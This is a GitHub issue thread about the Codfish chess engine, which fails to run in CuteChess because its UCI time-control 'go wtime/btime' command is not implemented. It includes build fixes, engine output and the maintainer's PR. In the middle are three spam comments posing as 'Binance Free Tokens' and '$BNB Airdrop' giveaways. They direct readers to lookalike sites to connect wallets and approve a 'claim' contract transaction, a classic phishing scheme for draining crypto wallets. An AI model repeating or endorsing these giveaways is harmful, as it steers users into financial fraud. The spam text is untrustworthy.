### ISSUE TITLE
does not run in CuteChess

### ISSUE THREAD

**Issue by tissatussa** [jsilll/chess-engine#50]
i managed to compile `Codfish` on Xubuntu 22.04 but not the way you describe in the README :

```
$ cmake --build build --config Release --target all -j 10 --
Error: /home/roelof/Compiled/codfish/build is not a directory
```

and after i created a folder `build` i get this next error :

```
$ cmake --build build --config Release --target all -j 10 --
Error: could not load cache
```

so, i tried the normal `cmake .` and this is successfull : a `Makefile` is created and after doing `make` i get a binary `codfish` of 4.9 Mb .. in terminal this runs fine, but only when giving the command `go`, not with time management eg. `go wtime 603000 btime 603000 winc 3000 binc 3000` which CuteChess uses .. what's wrong ?

**Comment by jsilll** [comment]
Hello Roelof,

Thank you for your interest in the project. You are
correct, the build instructions are wrong, it should be:

cmake --build build --config Release --target all

I will fix the README.md as soon as possible.

Regarding the go command, it should be a bug. Try with "go depth <depth>".
I am working on a new version of the engine (develop branch). My goal is to
correct the major bugs like this one and to improve the overall code
readability. I hope to get it done some time soon. 

Sorry for the trouble
you had to go through using the engine.

**Comment by tissatussa** [comment]
OK, good luck !
I always use CuteChess, and you should also test the engine with this (i use the GUI). The engine might work with `go depth #` or otherwise, but it should also run in CuteChess with the go-wtime-btime command i gave, otherwise your project is not realistic ..

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by manoharkumarmahto** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by Renyu106** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @codeaurelius, @andrewwxy, @ovieu, @lishin, @AsianKoala, @gustavocs97, @awayme

**Comment by tissatussa** [comment]
any chance the `go` command will fixed ?

**Comment by jsilll** [comment]
I opened a PR, can you check it?

**Comment by tissatussa** [comment]
> I opened a PR, can you check it?

it doesn't work ..

i thought you would implement the wtime & btime go command like `go wtime 603000 btime 603000 winc 3000 binc 3000` to play in CuteChess etc. .. this command still gives no output.

the `go depth..` command did already work in the last version, your newest version makes no difference (except bestmove !?) :

```
$ ./codfish_compiled_HP
Codfish Initialized in UCI Mode
uci
id name Codfish
id name Codfish
uciok
ucinewgame
position startpos
go depth 7
info score cp 36 depth 1 nodes 40 time 0 pv g1f3 
info score cp 0 depth 2 nodes 100 time 0 pv g1f3 g8f6 
info score cp 35 depth 3 nodes 1000 time 2 pv g1f3 g8f6 d2d4 
info score cp 0 depth 4 nodes 1538 time 7 pv g1f3 g8f6 d2d4 d7d5 
info score cp 33 depth 5 nodes 6969 time 28 pv g1f3 g8f6 d2d4 d7d5 b1c3 
info score cp 5 depth 6 nodes 59945 time 299 pv b1c3 g8f6 e2e4 d7d5 e4d5 f6d5 
info score cp 28 depth 7 nodes 116315 time 569 pv g1f3 g8f6 d2d4 d7d5 b1c3 b8c6 c1e3 
info score cp 22 depth 8 nodes 375925 time 1803 pv e2e4 c7c6 e4e5 d7d5 d2d4 b8d7 g1f3 e7e6 
bestmove e2e4
```

---

```
$ ./codfish_compiled_HP-fixed
Codfish Initialized in UCI Mode
uci
id name Codfish
id name Codfish
uciok
ucinewgame
position startpos
go depth 7
info score cp 36 depth 1 nodes 40 time 0 pv g1f3 
info score cp 0 depth 2 nodes 100 time 0 pv g1f3 g8f6 
info score cp 35 depth 3 nodes 1000 time 2 pv g1f3 g8f6 d2d4 
info score cp 0 depth 4 nodes 1538 time 7 pv g1f3 g8f6 d2d4 d7d5 
info score cp 33 depth 5 nodes 6969 time 29 pv g1f3 g8f6 d2d4 d7d5 b1c3 
info score cp 5 depth 6 nodes 59945 time 320 pv b1c3 g8f6 e2e4 d7d5 e4d5 f6d5 
info score cp 28 depth 7 nodes 116315 time 601 pv g1f3 g8f6 d2d4 d7d5 b1c3 b8c6 c1e3 
bestmove g1f3
```

**Comment by jsilll** [comment]
Before this PR it was hardcoded to always go until depth 8, as you can see from your snippets. For the time being I don't have much time to fix this command and implement it fully, I'm sorry. Besides, I would like to give this project a major overhaul to make things cleaner and better tested/benchmarked. That will happen some time in the future, surely!

**Comment by tissatussa** [comment]
> ..I don't have much time to fix this command and implement it fully..

OK, implementing a decent time management is not easy .. i understand.

I close this Issue because it's all clear now.
